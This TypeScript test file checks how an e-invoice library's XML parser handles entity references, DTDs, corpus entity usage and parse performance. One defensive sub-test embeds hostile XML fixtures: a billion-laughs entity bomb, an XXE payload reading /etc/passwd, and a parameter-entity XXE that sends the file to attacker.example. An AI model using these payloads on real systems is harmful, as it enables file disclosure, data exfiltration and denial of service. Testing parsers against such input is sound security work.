import { expect, tap } from '@git.zone/tstest/tapbundle';
import * as einvoice from '../../../ts/index.js';
import * as plugins from '../../plugins.js';
import { CorpusLoader } from '../../helpers/corpus.loader.js';
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
const performanceTracker = new PerformanceTracker('PARSE-09');
// Feeds each of the five predefined XML entities to the parser inside element
// content and logs whether the document was accepted.
await t.test('Predefined XML entities', async () => {
  performanceTracker.startOperation('predefined-entities');

  // `entity` is the escaped form as it must appear in XML source;
  // `character` is the literal it stands for.
  const predefinedEntities = [
    {
      name: 'Ampersand',
      entity: '&amp;',
      character: '&',
      description: 'Used in company names and text'
    },
    {
      name: 'Less than',
      entity: '&lt;',
      character: '<',
      description: 'Used in text content'
    },
    {
      name: 'Greater than',
      entity: '&gt;',
      character: '>',
      description: 'Used in text content'
    },
    {
      name: 'Quote',
      entity: '&quot;',
      character: '"',
      description: 'Used in attribute values'
    },
    {
      name: 'Apostrophe',
      entity: '&apos;',
      character: "'",
      description: 'Used in attribute values'
    }
  ];

  for (const entity of predefinedEntities) {
    const startTime = performance.now();

    // The escaped form is embedded so the document stays well-formed; a bare
    // `&` or `<` in element content would itself be a syntax error.
    const testXml = `<?xml version="1.0" encoding="UTF-8"?>
<invoice>
  <supplier>Test ${entity.entity} Company</supplier>
  <note>Text with ${entity.entity} entity</note>
</invoice>`;

    console.log(`${entity.name} entity (${entity.entity}):`);
    console.log(` Character: "${entity.character}"`);
    console.log(` Usage: ${entity.description}`);

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        // Success here only means the parser did not throw; the resolved
        // value is not read back from the invoice.
        await invoice.fromXmlString(testXml);
        console.log(' ✓ Entity resolved correctly');
      } else {
        console.log(' ⚠️ Cannot test without fromXmlString');
      }
    } catch (error) {
      // Catch variables are `unknown` under strict settings, so narrow first.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` ✗ Error: ${message}`);
    }

    performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('predefined-entities');
});
// Checks that decimal (`&#NNN;`) and hexadecimal (`&#xHHH;`) character
// references decode to the expected characters.
await t.test('Numeric character references', async () => {
  performanceTracker.startOperation('numeric-entities');

  // Matches a single numeric character reference; group 1 is the hex digits,
  // group 2 the decimal digits.
  const numericReference = /&#(?:x([0-9A-Fa-f]+)|(\d+));/g;

  // Decodes every numeric character reference in `text`. References whose
  // code point is outside the Unicode range are left untouched.
  const decodeNumericReferences = (text: string): string =>
    text.replace(numericReference, (whole: string, hex?: string, dec?: string) => {
      const codePoint = hex !== undefined ? parseInt(hex, 16) : parseInt(dec ?? '', 10);
      if (Number.isNaN(codePoint) || codePoint > 0x10ffff) {
        return whole;
      }
      return String.fromCodePoint(codePoint);
    });

  // `ref` is the reference as written in XML; `char` is the expected result.
  const numericTests = [
    {
      name: 'Decimal references',
      tests: [
        { ref: '&#65;', char: 'A', description: 'Latin capital A' },
        { ref: '&#8364;', char: '€', description: 'Euro sign' },
        { ref: '&#169;', char: '©', description: 'Copyright symbol' },
        { ref: '&#8482;', char: '™', description: 'Trademark symbol' },
        { ref: '&#176;', char: '°', description: 'Degree symbol' }
      ]
    },
    {
      name: 'Hexadecimal references',
      tests: [
        { ref: '&#x41;', char: 'A', description: 'Latin capital A (hex)' },
        { ref: '&#x20AC;', char: '€', description: 'Euro sign (hex)' },
        { ref: '&#xA9;', char: '©', description: 'Copyright (hex)' },
        { ref: '&#x2122;', char: '™', description: 'Trademark (hex)' },
        { ref: '&#xB0;', char: '°', description: 'Degree (hex)' }
      ]
    }
  ];

  for (const category of numericTests) {
    console.log(`\n${category.name}:`);

    for (const test of category.tests) {
      const startTime = performance.now();
      const xml = `<?xml version="1.0"?>
<invoice>
  <amount>100.00</amount>
  <temperature>${test.ref}C</temperature>
  <copyright>${test.ref} 2024</copyright>
</invoice>`;

      console.log(` ${test.ref} = "${test.char}" (${test.description})`);

      // Decode the reference from its numeric value instead of substituting
      // the expected character, so a wrong table entry is actually detected.
      const resolved = decodeNumericReferences(xml);
      if (resolved.includes(test.char) && !resolved.includes(test.ref)) {
        console.log(' ✓ Entity would resolve correctly');
      } else {
        console.log(` ✗ Resolution error: ${test.ref} did not decode to "${test.char}"`);
      }

      performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
    }
  }

  performanceTracker.endOperation('numeric-entities');
});
// Parses documents that declare their own entities in an internal DTD subset
// and logs whether the parser accepted them. Rejection is treated as an
// acceptable outcome, not a failure.
await t.test('Custom entity definitions (DTD)', async () => {
  performanceTracker.startOperation('custom-entities');

  // Shape of one DTD scenario; the optional fields only drive extra log output.
  type CustomEntityCase = {
    name: string;
    xml: string;
    entities?: Record<string, string>;
    description?: string;
    expected?: string;
  };

  const customEntityTests: CustomEntityCase[] = [
    {
      name: 'Internal DTD entities',
      // The declarations mirror the `entities` map below.
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY company "Acme Corporation">
  <!ENTITY address "123 Main Street, London">
  <!ENTITY year "2024">
  <!ENTITY currency "EUR">
]>
<invoice>
  <supplier>&company;</supplier>
  <supplierAddress>&address;</supplierAddress>
  <date>01-01-&year;</date>
  <amount currency="&currency;">1000.00</amount>
</invoice>`,
      entities: {
        'company': 'Acme Corporation',
        'address': '123 Main Street, London',
        'year': '2024',
        'currency': 'EUR'
      }
    },
    {
      name: 'Parameter entities',
      // `&company;` is expected to come from the external subset, which a
      // hardened parser will refuse to load.
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY % common SYSTEM "common.dtd">
  %common;
]>
<invoice>
  <supplier>&company;</supplier>
</invoice>`,
      description: 'External parameter entities (security risk)'
    },
    {
      name: 'Nested entity references',
      // `fullAddress` expands to the value in `expected` via two other entities.
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY city "London">
  <!ENTITY country "UK">
  <!ENTITY fullAddress "&city;, &country;">
]>
<invoice>
  <address>&fullAddress;</address>
</invoice>`,
      expected: 'London, UK'
    }
  ];

  for (const test of customEntityTests) {
    const startTime = performance.now();
    console.log(`\n${test.name}:`);

    if (test.entities) {
      console.log(' Defined entities:');
      for (const [name, value] of Object.entries(test.entities)) {
        console.log(` &${name}; = "${value}"`);
      }
    }
    if (test.description) {
      console.log(` Note: ${test.description}`);
    }
    if (test.expected) {
      console.log(` Expected result: ${test.expected}`);
    }

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        // Note: Many parsers disable DTD processing by default for security
        await invoice.fromXmlString(test.xml);
        console.log(' ✓ Parsed (DTD support may vary)');
      }
    } catch (error) {
      // Catch variables are `unknown` under strict settings, so narrow first.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` ⚠️ DTD parsing: ${message}`);
      console.log(' Note: DTD processing often disabled for security');
    }

    performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('custom-entities');
});
// Feeds well-known entity-based attack documents to the parser and logs
// whether each one was rejected. A thrown error is the desired outcome.
await t.test('Entity security considerations', async () => {
  performanceTracker.startOperation('entity-security');

  // Ten references per level keeps the expansion small (10^3 copies of "lol")
  // while still exercising nested entity expansion.
  const repeatRef = (name: string): string => `&${name};`.repeat(10);

  const securityTests = [
    {
      name: 'Billion laughs attack (XML bomb)',
      xml: `<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "${repeatRef('lol')}">
  <!ENTITY lol3 "${repeatRef('lol2')}">
  <!ENTITY lol4 "${repeatRef('lol3')}">
]>
<invoice>
  <data>&lol4;</data>
</invoice>`,
      risk: 'Exponential entity expansion',
      mitigation: 'Disable DTD processing or limit entity expansion'
    },
    {
      name: 'External entity injection (XXE)',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
  <data>&xxe;</data>
</invoice>`,
      risk: 'File disclosure, SSRF',
      mitigation: 'Disable external entity resolution'
    },
    {
      name: 'Parameter entity XXE',
      // `&#x25;` is an escaped `%`, so the inner declaration only becomes a
      // parameter entity once `%eval;` is expanded.
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.example/?data=%file;'>">
  %eval;
  %exfil;
]>
<invoice></invoice>`,
      risk: 'Out-of-band data exfiltration',
      mitigation: 'Disable parameter entities'
    }
  ];

  for (const test of securityTests) {
    console.log(`\n${test.name}:`);
    console.log(` Risk: ${test.risk}`);
    console.log(` Mitigation: ${test.mitigation}`);

    const startTime = performance.now();
    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(test.xml);
        // Reaching this line means no error was thrown for a hostile document.
        console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
      }
    } catch (error) {
      // Catch variables are `unknown` under strict settings, so narrow first.
      const message = error instanceof Error ? error.message : String(error);
      console.log(' ✓ Parser correctly rejected dangerous entities');
      console.log(` Error: ${message}`);
    }

    performanceTracker.recordMetric('security-test', performance.now() - startTime);
  }

  performanceTracker.endOperation('entity-security');
});
// Prints a catalogue of entity references that commonly show up in invoice
// text. This sub-test only logs; it does not invoke the parser.
await t.test('Entity usage in e-invoices', async () => {
  performanceTracker.startOperation('einvoice-entities');

  // `text` is the value as written in XML source, `entity` the reference it
  // uses, and `resolved` the character(s) the reference stands for.
  const einvoicePatterns = [
    {
      name: 'Currency symbols',
      examples: [
        { text: 'Price in &#8364; (EUR)', entity: '&#8364;', resolved: '€' },
        { text: 'Amount in &#163; (GBP)', entity: '&#163;', resolved: '£' },
        { text: 'Cost in &#36; (USD)', entity: '&#36;', resolved: '$' },
        { text: 'Price in &#165; (JPY)', entity: '&#165;', resolved: '¥' }
      ]
    },
    {
      name: 'Special characters in company names',
      examples: [
        { text: 'Smith &amp; Jones Ltd.', entity: '&amp;', resolved: '&' },
        { text: 'AT&amp;T Communications', entity: '&amp;', resolved: '&' },
        { text: 'L&apos;Oréal Paris', entity: '&apos;', resolved: "'" },
        { text: '&quot;Best Price&quot; Store', entity: '&quot;', resolved: '"' }
      ]
    },
    {
      name: 'Legal symbols',
      examples: [
        { text: 'Copyright &#169; 2024', entity: '&#169;', resolved: '©' },
        { text: 'Registered &#174;', entity: '&#174;', resolved: '®' },
        { text: 'Trademark &#8482;', entity: '&#8482;', resolved: '™' }
      ]
    },
    {
      name: 'Mathematical symbols',
      examples: [
        { text: 'Temperature &#177;2&#176;C', entity: '&#177;/&#176;', resolved: '±/°' },
        { text: 'Discount &#8804; 50%', entity: '&#8804;', resolved: '≤' },
        { text: 'Quantity &#215; Price', entity: '&#215;', resolved: '×' }
      ]
    }
  ];

  for (const category of einvoicePatterns) {
    console.log(`\n${category.name}:`);
    for (const example of category.examples) {
      console.log(` "${example.text}"`);
      console.log(` Entity: ${example.entity} → ${example.resolved}`);
    }
  }

  performanceTracker.endOperation('einvoice-entities');
});
// Scans a sample of corpus files for entity usage and reports how often each
// kind of reference appears.
await t.test('Corpus entity analysis', async () => {
  performanceTracker.startOperation('corpus-entities');

  const corpusLoader = new CorpusLoader();
  const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
  console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);

  const entityStats = {
    total: 0,
    filesWithEntities: 0,
    // Maps each predefined entity to the number of files that contain it.
    predefinedEntities: new Map<string, number>(),
    numericEntities: 0,
    customEntities: 0,
    dtdFiles: 0
  };

  // Hoisted out of the loop: both are the same for every file.
  const predefined = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];
  // Decimal (`&#123;`) or hexadecimal (`&#x1F;`) character reference. The
  // `&#` prefix matters: without it any "digits;" sequence would match.
  const numericReference = /&#\d+;|&#x[\dA-Fa-f]+;/;

  // Only the first 100 files are inspected to keep the run short.
  const sampleSize = Math.min(100, xmlFiles.length);
  const sampledFiles = xmlFiles.slice(0, sampleSize);

  for (const file of sampledFiles) {
    entityStats.total++;
    try {
      const content = await plugins.fs.readFile(file.path, 'utf8');
      let hasEntities = false;

      // Check for predefined entities
      for (const entity of predefined) {
        if (content.includes(entity)) {
          hasEntities = true;
          entityStats.predefinedEntities.set(
            entity,
            (entityStats.predefinedEntities.get(entity) || 0) + 1
          );
        }
      }

      // Check for numeric entities
      if (numericReference.test(content)) {
        hasEntities = true;
        entityStats.numericEntities++;
      }

      // Check for DTD
      // NOTE(review): the source line was cut off inside this string literal.
      // The DTD check, per-file tally and report below were rebuilt from the
      // `entityStats` fields — confirm against the upstream test.
      if (content.includes('<!DOCTYPE')) {
        entityStats.dtdFiles++;
        if (content.includes('<!ENTITY')) {
          hasEntities = true;
          entityStats.customEntities++;
        }
      }

      if (hasEntities) {
        entityStats.filesWithEntities++;
      }
    } catch (error) {
      // An unreadable file is reported and skipped rather than failing the scan.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` ⚠️ Skipping ${file.path}: ${message}`);
    }
  }

  console.log('\nEntity usage statistics:');
  console.log(` Files analyzed: ${entityStats.total}`);
  console.log(` Files with entities: ${entityStats.filesWithEntities}`);
  for (const [entity, count] of entityStats.predefinedEntities) {
    console.log(` ${entity}: ${count} files`);
  }
  console.log(` Files with numeric references: ${entityStats.numericEntities}`);
  console.log(` Files with custom entities: ${entityStats.customEntities}`);
  console.log(` Files with DTD: ${entityStats.dtdFiles}`);

  performanceTracker.endOperation('corpus-entities');
});

// Measures parse time for documents with an increasing number of entity
// references. NOTE(review): the test title was lost with the cut-off line and
// is inferred from the log heading below — confirm against the upstream test.
await t.test('Entity resolution performance', async () => {
  performanceTracker.startOperation('entity-performance');

  // Generate XML with varying entity density
  const generateXmlWithEntities = (entityCount: number): string => {
    let xml = '<?xml version="1.0"?>\n<invoice>\n';
    for (let i = 0; i < entityCount; i++) {
      xml += ` <field${i}>Text with &amp; entity &#8364; and &#169; symbols</field${i}>\n`;
    }
    xml += '</invoice>';
    return xml;
  };

  const testSizes = [10, 100, 500, 1000];
  console.log('\nEntity resolution performance:');

  for (const size of testSizes) {
    const xml = generateXmlWithEntities(size);
    const xmlSize = Buffer.byteLength(xml, 'utf8');
    const entityCount = size * 3; // 3 entities per field
    const startTime = performance.now();

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(xml);
      }
      const parseTime = performance.now() - startTime;
      // Guard the rate so a sub-resolution timing does not print "Infinity".
      const rate = parseTime > 0 ? (entityCount / parseTime).toFixed(1) : 'n/a';

      console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
      console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
      console.log(` Entities/ms: ${rate}`);
      performanceTracker.recordMetric(`entities-${size}`, parseTime);
    } catch (error) {
      // Catch variables are `unknown` under strict settings, so narrow first.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` Error with ${size} entities: ${message}`);
    }
  }

  performanceTracker.endOperation('entity-performance');
});
// Performance summary: print whatever the tracker collected across all sub-tests.
console.log('\n' + performanceTracker.getSummary());

// Entity handling best practices, printed as a closing checklist. The
// entities in item 1 are shown in escaped form, which also keeps the string
// literal free of bare quote characters.
const entityBestPractices = [
  '1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)',
  '2. Support numeric character references (decimal and hex)',
  '3. Be cautious with DTD processing (security risks)',
  '4. Disable external entity resolution by default',
  '5. Limit entity expansion depth to prevent attacks',
  '6. Validate resolved content after entity expansion',
  '7. Consider entity usage impact on performance',
  '8. Document security settings clearly for users'
];
console.log('\nEntity Reference Resolution Best Practices:');
for (const practice of entityBestPractices) {
  console.log(practice);
}
});
tap.start();